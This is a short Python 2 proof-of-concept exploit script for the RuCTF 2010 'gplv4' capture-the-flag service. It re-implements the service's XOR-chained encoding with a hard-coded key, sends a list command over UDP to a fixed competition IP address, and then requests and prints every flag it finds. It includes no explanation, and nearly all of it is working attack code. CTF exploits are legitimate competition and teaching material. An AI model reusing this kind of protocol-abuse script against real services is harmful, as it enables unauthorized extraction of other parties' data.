# ructf2010 gplv4 poc # http://smokedchicken.org from socket import * import random def decode(key, data): index = 0; out = "" while index < len(data): len2 = len(key) if (len(key) > len(data)): len2 = len(data) if index < 8: for i in range(len2): out = out + chr(ord(data[i]) ^ ord(key[i])) else: key2 = data[index - 8:index] len2 = len(key2) if (len2 + index > len(data)): len2 = len(data) - index for i in range(len2): out = out + chr(ord(data[i + index]) ^ ord(key2[i])) index = index + 8 return out def encode(key, data): index = 0; out = "" while index < len(data): len2 = len(key) if (len(key) > len(data)): len2 = len(data) if index < 8: for i in range(len2): out = out + chr(ord(data[i]) ^ ord(key[i])) else: key2 = out[index - 8:index] len2 = len(key2) if (len2 + index > len(data)): len2 = len(data) - index for i in range(len2): out = out + chr(ord(data[i + index]) ^ ord(key2[i])) index = index + 8 return out def udp_transfer(data, host, norecv): port = random.randint(1025,65534) udp = socket(AF_INET, SOCK_DGRAM) udp.sendto(data, (host, port)) if norecv == 0: (data2, addr) = udp.recvfrom(500) return data2 else: return def put_flag(host): key = 'THINKPAD' cmd_put = 'Pfgzl-4sbb-2sx6:ADHASDKASDIAIDADADAPIASPDIDPQ43=' data = encode(key, cmd_put) udp_transfer(data, host, 1) key = 'THINKPAD' host = '10.40.3.113' #put_flag(host) cmd_list = 'L' data = encode(key, cmd_list) data2 = udp_transfer(data, host, 0) flags_string = decode(key, data2) flags = flags_string.split(';'); for flag in flags: if flag == "": break cmd_get = "G" + flag data = encode(key, cmd_get) data2 = udp_transfer(data, host, 0) print decode(key, data2)